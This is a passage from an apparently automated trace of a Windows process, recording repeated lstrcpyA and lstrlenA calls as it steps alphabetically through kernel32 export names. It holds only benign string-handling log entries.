(lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.430] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.430] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.430] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.430] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.430] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.430] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.430] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.431] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.431] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.431] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.431] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.431] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.431] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.431] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.431] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.431] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.431] lstrlenA (lpString="BEEP") returned 4 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.431] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.431] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.431] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.431] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.431] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.431] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.431] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.431] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.431] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.431] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.432] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.432] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.432] lstrlenA (lpString="CANCELIO") returned 8 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.432] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.432] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.432] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.432] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.432] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.432] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.432] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.432] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.432] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.432] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.432] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.432] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.432] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.432] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.432] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.432] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.433] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.433] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.433] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.433] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.433] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.433] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.433] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.433] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.433] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.433] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.433] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.433] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.433] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.433] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.433] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.433] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.433] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.433] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.433] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.434] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.434] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.434] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.434] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.434] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.434] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.434] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.434] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.434] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.434] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.434] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.434] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.434] lstrlenA (lpString="COPYFILEA") returned 9 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.434] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.434] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.434] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.434] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.434] lstrlenA (lpString="COPYFILEW") returned 9 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.435] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.435] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.435] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.435] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.435] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.435] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.435] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.435] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.435] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.435] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.435] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.435] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.435] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.435] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.435] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.435] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.435] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.435] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.436] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.436] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.436] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.436] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.436] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.436] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.436] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.436] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.436] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.436] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.436] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.436] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.436] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.436] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.436] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.436] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.436] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.436] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.436] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.437] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.437] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.437] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.437] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.437] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.437] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.437] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.437] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.437] 